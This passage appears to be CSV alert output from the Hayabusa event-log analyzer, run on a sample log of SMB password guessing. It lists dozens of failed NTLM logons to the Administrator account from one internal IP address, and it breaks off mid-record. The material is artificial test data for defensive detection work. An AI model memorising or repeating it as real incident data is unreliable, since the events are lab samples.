2016-09-20 01:51:08.342 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9elGZ4POExblUCAK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:08.385 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XHY9Ig3sqQKNXYqq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:08.424 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: voMDzTqYqKpfudKo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:08.457 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: m8m9SJ1aFpvFqClU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:08.496 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dM84lQYVfHhZmgpK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:08.541 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: O5FrdBbYXWaqFkeb | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:08.588 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZxiNMjsd3YfoCNa2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:08.628 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: v1u5uD9SiDFq9VOD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:08.675 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pZv9l3b7U8tIVmw8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:08.716 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7EfPqiBhm6hRX700 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:08.763 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3uvqgri2KGIDAlg1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:08.816 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oLXZMXKsjOaurgZV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:08.860 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nXtiRWHDJqpq69Ej | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:08.915 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OeC1T9YkT1hXMcGG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:08.965 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YPf6nlwAeuu7cf00 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:09.008 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4fvVUozD2RuIchN4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:09.052 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KP3rghcrgas3l3q1 | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:09.084 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MMtcQYoVoM57gTcj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:09.137 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IFjTWECEep09Abjt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:09.177 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jUlguy8tKBo4DSUR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:09.212 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GETwMERLpiVtMRkw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:09.248 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Bhas9Vjc193EVcOg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:09.288 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OmVAnxq39t7qbcEs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:09.332 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 13y2nnltjipwZqth | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:09.369 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wDQrPBL1VodIcQLR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:09.417 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: K0Mp4jXeHd3b0CLw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:09.472 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3j89GmIDnG4v7JJC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:09.512 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xyRLZMoaXJUrPPfn | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:09.607 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZcoyOKUjEi1uCSpD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:09.648 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jWQGVJLcVwgf4YJ8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:09.688 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mrFqG85mmjTYJ4A9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:09.728 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6DqIh1QHTk470nrU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:09.774 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: feVbA94p6iT2pBeC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:09.804 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: T30YHcE8ZG7FaxW7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:09.847 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RaKHRwYtx2lGtOCG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:09.884 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zDEDuMmlDZZfdkFD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:09.935 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CObqGJQi1hOOI83J | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:10.002 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EhsE9bQeEwW21bAj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:10.050 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: El1qxgjvGS0QSS4Y | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:10.097 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vtlr3HwzJcAfSxuO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:10.141 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KDayr44iXmE63vqd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:10.195 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FkNoLVOhnS8ayujK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:10.252 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3ggg78jjziKqijrT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:10.313 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BodeSVqeqa5qBQDL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:10.362 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yY7yxEcuGwWSJZV2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:10.406 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oTlg6cvsz6Z6QpCp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:10.460 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: V3pTALzqu4Ok6CUR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:10.509 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kdGagQIEcvQQMp4n | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:10.557 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fVu4reOyQEIkChHO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:10.609 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EJWNS69MmMGLSnHc | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:10.656 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nPaR2sBxPPCjxpL0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:10.706 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kJJ9A1EfqM4V2TRv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:10.760 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4dxf59xjpxO3oG17 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:10.804 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: o6dMI12g4tjSF8PX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:10.841 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZAqN0xPaW4jg2Kjc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:10.884 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mcnReyIEaqsQfowV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:10.928 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: akOH8Y7XdjOpqTez | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:10.967 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: b0HOK1TIqloud7gh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:10.996 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: n6uIAK55BmTnA6Bf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:11.042 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZDnn6QmLOJ6KwzKt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:11.084 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: np8KaRJvRqBrGyFL | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:11.128 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dxbu69Amr6gWN5Hw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:11.164 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LoZdaFJWNON8Ujnc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:11.212 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: q4RSlXgOS7sssCqU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:11.252 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: j2PJprE7olK4pjrx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:11.297 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jQOAUcWQL32y2gGe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:11.361 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nXI0wWwzhHN0uvOP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:11.414 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ujGqTzfOhmKgoAjt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:11.468 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cFoPtWZ03O3ZZgOC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:11.520 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EyO2VTnpGZLeSIvr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:11.560 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ua69MEWABQ9hsooT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:11.608 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ubPQWn4nQYr3rXr8 | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:11.650 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xrgATdNqkA44nKqf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:11.688 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qKwktiUfTWakNx3I | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:11.728 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xVebPFnWhbZKIANs | IP Addr: 192.168.198.149 | AuthPackage: 